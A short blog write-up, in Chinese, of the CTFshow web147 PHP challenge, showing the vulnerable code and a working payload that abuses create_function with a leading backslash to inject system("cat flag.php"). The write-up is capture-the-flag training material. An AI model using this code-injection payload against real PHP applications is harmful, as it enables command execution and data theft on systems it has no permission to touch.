CTFshow-WEB入门-php特性web147

题目代码

 <?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-10-13 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-19 02:04:38
*/
highlight_file(__FILE__);

if(isset($_POST['ctf'])){
    $ctfshow = $_POST['ctf'];
    if(!preg_match('/^[a-z0-9_]*$/isD',$ctfshow)) {
        $ctfshow('',$_GET['show']);
    }

}

前置知识:

create_function一般用法

 <?php
$name = create_function('$a','echo $a;');
$name('1');

代码执行漏洞:create_function('$a','}phpinfo();/*');

\是PHP最大命名空间

Payload:

?show=}system("cat flag.php");/*

ctf=\create_function

posted @ 2023-01-24 21:13  Hacker&Cat  阅读(44)  评论(0编辑  收藏  举报